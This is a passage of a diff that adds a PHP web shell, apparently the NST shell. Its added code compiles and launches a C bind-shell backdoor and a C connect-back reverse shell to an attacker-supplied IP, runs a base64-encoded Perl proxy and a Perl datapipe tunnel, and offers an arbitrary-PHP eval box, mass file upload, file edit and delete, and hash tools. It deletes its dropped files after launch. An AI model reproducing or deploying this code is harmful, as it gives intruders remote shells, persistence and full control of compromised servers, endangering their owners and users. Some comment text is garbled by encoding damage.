gPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## �������� ��� ������� (1-��, 0-���)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"������ ������� ����� ��� ����������: \$!\";
+
+print \"�������� ���������� �����.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"�������� ��������� accept: \$!\n\";
+                next;
+        }
+
+        printf(\"����� ������: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"���������� ��������� fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## ����� �������
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ������ �������, ��������� �����.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: ������ �������� �� \$o->{'tohost'}, ���� \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: ������� �������� �� %s, ���� %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: �������� �������� ��� ����� \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: �������� ����.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: ������ Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: ���� ������ �� �������.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: ������ ��� ���������� ������ �������: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: ������ ������������.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: ������: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: ���� ������.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: ���������� ������� ������: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: ��������� ������������.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: ������: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: ���������� \$len ����.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: ������ ����������.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: ���������� ��������� ������: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: ���������� \$len ���� �������.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: ������ ����������..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: ���������� ��������� ������: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
